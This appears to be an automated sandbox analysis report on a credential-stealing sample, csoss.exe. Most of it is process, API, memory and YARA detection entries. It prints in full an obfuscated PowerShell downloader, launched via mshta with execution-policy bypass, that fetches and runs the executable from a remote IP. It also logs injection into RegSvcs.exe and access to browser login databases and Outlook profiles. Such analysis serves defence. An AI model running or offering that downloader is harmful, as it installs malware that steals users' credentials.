                    Source: 6.2.csoss.exe.2410000.1.raw.unpack, FFDecryptor.cs | Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                    Source: 6.2.csoss.exe.2410000.1.raw.unpack, FFDecryptor.cs | Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text9 + "\\mozglue.dll"))
                    Source: C:\Users\user\AppData\Roaming\csoss.exe | Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
                    Source: C:\Users\user\AppData\Roaming\csoss.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 280008
                    Source: C:\Users\user\AppData\Roaming\csoss.exe | Code function: 6_2_002087B1 LogonUserW
                    Source: C:\Users\user\AppData\Roaming\csoss.exe | Code function: 6_2_001B3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
                    Source: C:\Users\user\AppData\Roaming\csoss.exe | Code function: 6_2_001B48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
                    Source: C:\Users\user\AppData\Roaming\csoss.exe | Code function: 6_2_00214C27 mouse_event
                    Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwERSHell.exe -ex bYpaSS -NoP -w 1 -C deVIcecreDENTiALDeplOYMENt.exE ; IeX($(iEX('[sYSTeM.TeXt.EnCOdIng]'+[cHAr]58+[Char]0X3a+'UtF8.gETStrINg([sYSteM.cOnVERT]'+[ChAR]0X3a+[ChAR]58+'frOMbASe64STrIng('+[CHAr]0x22+'JEd2QVYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtVFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyREVGaU5JdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXlSVVR0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdU5kcFNxLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkksSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9oc28pOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInJPbFN5IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNwYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRlS3lvTmQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkR3ZBVjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC8xMTAvY3Nvc3MuZXhlIiwiJGVOVjpBUFBEQVRBXGNzb3NzLmV4ZSIsMCwwKTtTdEFyVC1zTEVlUCgzKTtpTlZvS0UtSVRFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXGNzb3NzLmV4ZSI='+[char]34+'))')))"
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwERSHell.exe -ex bYpaSS -NoP -w 1 -C deVIcecreDENTiALDeplOYMENt.exE ; IeX($(iEX('[sYSTeM.TeXt.EnCOdIng]'+[cHAr]58+[Char]0X3a+'UtF8.gETStrINg([sYSteM.cOnVERT]'+[ChAR]0X3a+[ChAR]58+'frOMbASe64STrIng('+[CHAr]0x22+'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'+[char]34+'))')))"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dkgvurtz\dkgvurtz.cmdline"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Roaming\csoss.exe "C:\Users\user\AppData\Roaming\csoss.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEEFD.tmp" "c:\Users\user\AppData\Local\Temp\dkgvurtz\CSCEFC899AF36F541BC9861FF65BE4F3BB.TMP"
                    Source: C:\Users\user\AppData\Roaming\csoss.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\csoss.exe"
                    Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]0x22+'jed2qvygicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagicbbrgqtvflwrsagicagicagicagicagicagicagicagicagicagicagicattwvtymvyrevgau5jdglpbiagicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidxjstu9olkrsbcisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagssxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagyxlsvvr0lhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbxdu5kcfnxlhvpbnqgicagicagicagicagicagicagicagicagicagicagicagqkkssw50uhryicagicagicagicagicagicagicagicagicagicagicagig9oc28poycgicagicagicagicagicagicagicagicagicagicagicaglu5hbwugicagicagicagicagicagicagicagicagicagicagicaginjpbfn5iiagicagicagicagicagicagicagicagicagicagicagicatbkfnrvnwywnlicagicagicagicagicagicagicagicagicagicagicagigrls3lvtmqgicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicakr3zbvjo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlzizljk1ljizns4yoc8xmtavy3nvc3muzxhliiwijgvovjpbufbeqvrbxgnzb3nzlmv4zsismcwwktttdefyvc1ztevlucgzkttptlzvs0utsvrftsagicagicagicagicagicagicagicagicagicagicagicaijgvuvjpbufbeqvrbxgnzb3nzlmv4zsi='+[char]34+'))')))"
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]0x22+'jed2qvygicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagicbbrgqtvflwrsagicagicagicagicagicagicagicagicagicagicagicattwvtymvyrevgau5jdglpbiagicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidxjstu9olkrsbcisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagssxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagyxlsvvr0lhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbxdu5kcfnxlhvpbnqgicagicagicagicagicagicagicagicagicagicagicagqkkssw50uhryicagicagicagicagicagicagicagicagicagicagicagig9oc28poycgicagicagicagicagicagicagicagicagicagicagicaglu5hbwugicagicagicagicagicagicagicagicagicagicagicaginjpbfn5iiagicagicagicagicagicagicagicagicagicagicagicatbkfnrvnwywnlicagicagicagicagicagicagicagicagicagicagicagigrls3lvtmqgicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicakr3zbvjo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlzizljk1ljizns4yoc8xmtavy3nvc3muzxhliiwijgvovjpbufbeqvrbxgnzb3nzlmv4zsismcwwktttdefyvc1ztevlucgzkttptlzvs0utsvrftsagicagicagicagicagicagicagicagicagicagicagicaijgvuvjpbufbeqvrbxgnzb3nzlmv4zsi='+[char]34+'))')))"
                    Source: C:\Users\user\AppData\Roaming\csoss.exe | Code function: 6_2_00207CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
                    Source: C:\Users\user\AppData\Roaming\csoss.exe | Code function: 6_2_0020874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid
                    Source: csoss.exe, 00000006.00000002.1392686190.0000000000264000.00000002.00000001.01000000.0000000A.sdmp, csoss.exe.3.dr, csoss[1].exe.3.dr | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                    Source: csoss.exe | Binary or memory string: Shell_TrayWnd
                    Source: C:\Users\user\AppData\Roaming\csoss.exe | Code function: 6_2_001D862B cpuid
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_001E4E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,6_2_001E4E87
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_001F1E06 GetUserNameW,6_2_001F1E06
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_001E3F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,6_2_001E3F3A
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_001B49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,6_2_001B49A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    Source: Yara match; File source: 7.2.RegSvcs.exe.430000.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 6.2.csoss.exe.2410000.1.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 6.2.csoss.exe.2410000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 00000006.00000002.1393958213.0000000002410000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000007.00000002.2504028949.0000000000432000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: Process Memory Space: csoss.exe PID: 2576, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: RegSvcs.exe PID: 5304, type: MEMORYSTR
                    Source: Yara match; File source: 7.2.RegSvcs.exe.430000.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 6.2.csoss.exe.2410000.1.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 6.2.csoss.exe.2410000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 00000006.00000002.1393958213.0000000002410000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000007.00000002.2504028949.0000000000432000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: Process Memory Space: csoss.exe PID: 2576, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: RegSvcs.exe PID: 5304, type: MEMORYSTR
                    Source: Yara match; File source: 7.2.RegSvcs.exe.430000.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 6.2.csoss.exe.2410000.1.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 6.2.csoss.exe.2410000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 00000006.00000002.1393958213.0000000002410000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000007.00000002.2504028949.0000000000432000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: Process Memory Space: csoss.exe PID: 2576, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: RegSvcs.exe PID: 5304, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: csoss.exe; Binary or memory string: WIN_81
                    Source: csoss.exe; Binary or memory string: WIN_XP
                    Source: csoss.exe; Binary or memory string: WIN_XPe
                    Source: csoss.exe; Binary or memory string: WIN_VISTA
                    Source: csoss.exe; Binary or memory string: WIN_7
                    Source: csoss.exe; Binary or memory string: WIN_8
                    Source: csoss[1].exe.3.dr; Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
                    Source: Yara match; File source: 7.2.RegSvcs.exe.430000.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 6.2.csoss.exe.2410000.1.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 6.2.csoss.exe.2410000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 00000006.00000002.1393958213.0000000002410000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
